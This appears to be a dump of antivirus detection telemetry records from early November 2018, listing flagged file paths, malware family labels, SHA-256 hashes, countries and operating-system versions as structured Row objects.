  Row(detection=Row(filename='avscan-20181102-054826-e3a0ce23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054826-E3A0CE23', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='8605250801f13c10538a35dd8909965043b6aeb907d1870f0f7324bab3f44db2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T23:10:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:41:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ldapmodify.exe', filepath='\\\\?\\D:\\app\\Administrator\\product\\11.2.0\\dbhome_1\\BIN\\ldapmodify.exe', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='750176b52342af23467ca33e64a745e24a6ba960f8dd86135f78798f9bf22e08', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:41:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053911-987dd31f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053911-987DD31F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054305-244bc422', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054305-244BC422', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060937-d8ecdd20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060937-D8ECDD20', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060730-8d83647c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060730-8D83647C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054458-6724ddf1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054458-6724DDF1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055432-bd56130e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055432-BD56130E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055722-22d08f35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055722-22D08F35', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051448-30c4771f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051448-30C4771F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051944-e1378d7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051944-E1378D7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062227-a42be930', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062227-A42BE930', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062407-dfab2fa3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062407-DFAB2FA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051931-d93394c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051931-D93394C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060128-b5aa91a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060128-B5AA91A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050300-8a84e121', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050300-8A84E121', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055146-5a86f06a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055146-5A86F06A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:05:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155427-b224ad41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155427-B224AD41', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cc.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\fluent\\ntbin\\win64\\cc.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='18ac69750e5cfc3f7cf1a42e7c197d738810364bbe4e6a13d3c5518b2a6814e2', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T21:02:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160219-018a0bbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160219-018A0BBD', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155352-ac39f96d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155352-AC39F96D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eosmisc.exe', filepath='E:\\DCIM\\EOSMISC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2366891\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:12:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:30:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dokumentasi.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\DOKUMENTASI.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rmid.exe', filepath='C:\\Program Files\\Java\\jre6\\bin\\rmid.exe', filesize=116000, name='W32/Sality.AW.#M1.#R1'), hash='4f06bff0b5de2409bf0d25b5c22156ddc83a5182f2d44c224961127e0a56a620', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T02:56:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='shared.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\SHARED\\SHARED.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155208-9ab3de3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155208-9AB3DE3A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-18-13-43.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-01T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T21:44:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='213691076015634.acv.zzz', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\213691076015634.acv.zzz', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:16:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155326-a7dbad06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155326-A7DBAD06', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1ca91954b7c472a5df424c20948325f86dcd70dcf888087566e352e4f6aa77c2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_11.10.2018-40.available\\Avira\\1CA91954B7C472A5DF424C20948325F86DCD70DCF888087566E352E4F6AA77C2', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='1ca91954b7c472a5df424c20948325f86dcd70dcf888087566e352e4f6aa77c2', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T10:48:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='11 new.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\AUDIT 2015\\POINT AUDIT 2015\\Point 11 new\\11 new.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_15_7_0.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_15_7_0.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='3fc8f55a0284c834653c6a71369a0fd1cd2aec5c87316d83c1530357d01b6cb0', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:16:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181340-fd2bc254', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_76e5719a\\AVSCAN-20181101-181246-F6440152\\AVSCAN-20181101-181340-FD2BC254', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155627-c661b002', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155627-C661B002', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='training labor & hse 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\jadwal training Labor & HSE 2015\\training Labor & HSE 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msi1893.tmp', filepath='c:\\users\\X\\appdata\\local\\temp\\msi1893.tmp', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='97c8fe434d7f74bdf53f9de1e6c79f9ec2389681c27b98376ead536bbd603d48', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\msiexec.exe', parentsize=73216, timestamp='2018-11-01T01:46:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fxc_proxyprocess.exe', filepath='C:\\Program Files\\Foxit Software\\Foxit Reader\\plugins\\Creator\\FXC_ProxyProcess.exe', filesize=140000, name='W32/Sality.AT.#M1.#R1'), hash='56a407df12fe080a9aa79631cdde0c3e2c84f18daece8a1c02f283a127352678', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T17:31:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes73\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='cda2c430ab5a662b70c25f640f2ad44194a5dfbc9c98580242508f6cec75209c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:27:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111456-18a3af8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111456-18A3AF8A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:14:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:01:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nseA479.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=17074688, timestamp='2018-11-01T07:27:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-024914-9abac164', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d265d3ba\\AVSCAN-20181102-024828-93CDD881\\AVSCAN-20181102-024914-9ABAC164', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T23:49:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T18:57:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110752-e31fdc1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110752-E31FDC1D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112102-46cc634f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112102-46CC634F', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:20:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161503-e9a7b544', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161503-E9A7B544', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='640434aa3e4841d8960d6351053691f5247bbf502519670db068d8e6bc32edfe', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:15:14Z'), dt=datetime.date(2018, 11, 1)),
